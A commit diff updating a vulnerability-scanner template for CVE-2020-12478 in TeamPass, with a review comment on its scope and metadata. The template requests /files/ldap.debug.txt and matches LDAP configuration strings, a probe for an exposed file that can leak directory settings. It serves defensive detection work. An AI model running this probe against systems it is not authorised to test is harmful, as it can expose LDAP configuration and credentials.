Update CVE-2020-12478.yaml

patch-1
Ritik Chaddha 2022-08-17 16:45:20 +05:30 committed by GitHub
parent 3dce4845b5
commit d909ff8f56
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 13 additions and 12 deletions


@ -1,34 +1,35 @@
id: CVE-2020-12478 id: CVE-2020-12478
info: info:
name: TeamPass 2.1.27.36 - Unauthenticated File Access name: TeamPass 2.1.27.36 - Unauthenticated Access
author: arafatansari author: arafatansari
severity: high severity: high
description: | description: |
TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files. TeamPass 2.1.27.36 allows an unauthenticated attacker to retrieve files from the TeamPass web root. This may include backups or LDAP debug files.
reference: reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2020-12478
- https://github.com/nilsteampassnet/TeamPass/issues/2764 - https://github.com/nilsteampassnet/TeamPass/issues/2764
- https://nvd.nist.gov/vuln/detail/CVE-2020-12478
classification:
cve-id: CVE-2020-12478
metadata: metadata:
verified: true
shodan-query: http.html:"teampass" shodan-query: http.html:"teampass"
verified: "true" tags: cve,cve2020,teampass,exposure
tags: file,cve,2020
requests: requests:
- raw: - method: GET
- | path:
GET /files/ldap.debug.txt HTTP/1.1 - "{{BaseURL}}/files/ldap.debug.txt"
Host: {{Hostname}}
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status
status:
- 200
- type: word - type: word
words: words:
- 'Get all LDAP params' - 'Get all LDAP params'
- 'type' - 'type'
- 'account_suffix' - 'account_suffix'
condition: and condition: and
- type: status
status:
- 200
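Review bot: The request in what appears to be the new side probes only `{{BaseURL}}/files/ldap.debug.txt`, while the description covers any file under the TeamPass web root, backups included. A non-match therefore shows only that the LDAP debug file is absent, not that the instance is unaffected. I would state that limit in the description, for example `This template only checks for an exposed files/ldap.debug.txt; a negative result does not rule out other exposed files.` The shortened name `TeamPass 2.1.27.36 - Unauthenticated Access` reads like an authentication bypass, so keeping `Unauthenticated File Access` would match the description better. The `classification` block seems to carry only `cve-id`; filling in `cvss-metrics`, `cvss-score` and `cwe-id` from the NVD entry already listed under `reference` would let severity-based triage work from the template itself.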